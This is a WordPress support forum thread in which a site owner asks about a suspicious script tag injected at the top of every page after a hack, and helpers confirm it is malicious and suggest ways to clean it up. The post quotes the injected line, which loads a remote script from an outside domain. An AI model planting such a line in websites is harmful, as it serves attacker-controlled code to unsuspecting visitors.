WordPress Hacked, residule malicious code?

  • swvc

    (@swvc)


    9 years, 10 months ago

    Hi,

    My blog was hacked recently, however using a backup I have managed to bring it back from the dead. I have since installed better security and started backing everything up much more efficiently.

    However, there is some code in the very top of all the pages that seems very suspicous…

    <script type="text/javascript" src="http://shinohei.com/enkai/nmbdptqv.php?id="></script>

    It then goes on to display the rest of the site, eg:

    <!DOCTYPE HTML><html lang="en-US" prefix="og: http://ogp.me/ns#" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#">

    Is this some left over malicious code? If so, how do I remove it?

    Thank-you very much.

Viewing 4 replies - 1 through 4 (of 4 total)
  • Mark (podz)

    (@podz)

    9 years, 10 months ago

    Please follow all the steps listed here:

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    BenSucuri

    (@rngdmstr)

    9 years, 10 months ago

    If you can SSH into the server, do a ‘grep’ command for shinohei and that will let you know all of the files that contain that code 😉

    From there, it’s as simple as deleting that string that you mentioned and saving overtop.

    The Hack Repair Guy

    (@tvcnet)

    9 years, 10 months ago

    Yes, that is most definitely malicious code.

    If I were reviewing I would download the site to my computer and do some file searches for that domain in the link you show above, among other searches.

    Try that download and search just be to sure you got everything. Better safe…

    peter_sucuri

    (@peter_sucuri)

    9 years, 10 months ago

    Hmm, injection of such short link prior to the rest of the legitimate site code could be also server-level infection. In such case, the cooperation with your hosting provider will be necessary. If you’re still having the problem please let us know here and let us know what steps did you already followed.

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘WordPress Hacked, residule malicious code?’ is closed to new replies.